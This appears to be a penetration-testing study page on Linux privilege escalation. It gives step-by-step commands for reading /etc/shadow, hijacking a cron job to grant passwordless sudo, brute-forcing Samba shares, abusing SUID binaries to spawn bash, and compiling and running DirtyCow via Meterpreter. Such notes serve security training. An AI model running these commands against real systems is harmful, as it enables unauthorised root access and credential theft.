Tier II

Linux

Linux is a free and open-source operating system that combines the Linux kernel and the GNU toolkit.

Info Exploit
Kernel Exploit Vulnerabilities
Linux Icon

Linux

Linux is a free and open-source operating system that combines the Linux kernel and the GNU toolkit (a collection of utilities like cat, ls commands..).

It is often deployed as a server, thus it is common to find certain open ports on Linux systems.


There are many different Linux distros, that are variants of the operating system using different desktops.



Useful Linux Commands


Create a bash session on the target:
shell

Create the bash session:
/bin/bash -i

Change folder (back):
cd ../folder

Change folder (forward):
cd folder

Change file permissions:
chmod u+x file

Check available shells (usually on Kali Linux):
ls -al /usr/share/webshells

Check for installed sudo rights:
sudo -l

Check system kernel version:
uname -a

Get info about the target operating system:
sysinfo

Find running processes:
ps aux

List active network connections:
netstat -tunlp

List all files and permissions:
ls -l

List users on the system:
cat /etc/passwd

Read system password shadow file (if possible):
cat /etc/shadow

Search for a file:
find / -name "filename" 2>/dev/null

Search for SUID binaries (privilege escalation):
find / -perm -4000 2>/dev/null

Show current directory:
pwd

Show current user:
whoami

Show the IP configuration of the target network:
ifconfig

Exploit Linux



Exploit Misconfigured Cron Jobs


Linux implements tasks using Cron. Cron is a time-based service that runs applications and commands repeatedly on specified schedule (cronjob).

Every user can create a cronjob, but these tasks will run with the same privileges of the user that created them.

Example

Find every occurrence of the path:
grep -rnw /usr -e "/home/student/message"

See the content of the file that is the occurrence of the file in our folder:
cat occurence-path

Redirect this message into our target cronjob:
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh


Exploit Samba


Samba is the Linux version of SMB and it is used to consent file sharing with Windows systems.

Samba is not preconfigured in Linux, so it is not a service that is used often.

You can perform a brute-force with Hydra to gain credentials and access to user shares.


Use SmbMap to access the shares of the user we have found with Hydra:
smbmap -H target-ip -u admin -p target-password

Use Smbclient to navigate in the target share with the target credentials
smbclient //target-ip/target-share -U admin

You can use enum4linux to get an overview of the target system:
enum4linux -a -u admin -p target-password target-ip


Exploiting SUID Binaries


In addition to the standards permissions (read, write, execute), Linux has another privileges called SUID (Set Owner User Id).

SUID allows a non privileged user to access or execute a file with elevated privileges.

List all the files that are executed by the file with the s permission:
string file-with-s-permissions

We have seen there is a file (in this case greetings) that is executed too,
we can remove it and replace with another one to gain privileges:
rm file

Copy the bin/bash into the file so that when it is executed it will give us privileges:
cp /bin/bash file

Execute this file:
./file-with-s-permission

Linux Kernel Exploits

Kernel exploits will target Linux vulnerabilities to execute commands to obtain privileged system commands in order to obtain a shell.

Kernel escalation process:

  • Identify Kernel vulnerabilities
  • Downloading, compiling and transfer kernel exploits into the target system

    • You can use various tools, for example Linux-Exploit-Suggester or Dirty-Cow (both from GitHub)


    Exploit-Suggester


    Perform a Linux exploit in order to gain Meterpreter shell on the target
    Download linux-exploit-suggester from GitHub
    On the target shell (via meterpreter), upload the Linux Exploit Suggester on the target:
    upload linux-exploit-suggester-path

    Execute a shell:
    shell

    Make the Linux Exploit Suggester that you have just executed, executable:
    chmod +x les.sh

    Execute the Linux Exploit Suggester:
    ./les.sh

    This tool will give you all the possible exploits on the target, with details and probabilities.


    DirtyCow


    Download the DirtyCow tool from GitHub or exploit-db
    On Meterpreter shell, upload the dirty cow tool in your target system:
    upload path-to-dirtycow

    Compiler for C language: sudo apt-get install gcc

    Rename the file:
    mv 40839.c dirty.c

    Execute this command
    gcc -pthread dirty.c -o dirty -lcrypt

    Select a password to use, this command will create a new user with that password (you can also configure username):
    ./dirty password

    Log in with the new user (use the correct username):
    su firefart

    Linux Vulnerabilities


    Exploiting Bash Vulnerability: ShellShock (Apache)


    This vulnerability allows the attacker to execute commands on the Linux target system and targets Apache and Bash.

    To exploit this vulnerability you can try to do it manually writing bash commands on the CGI interface, or you can use Metasploit exploit modules.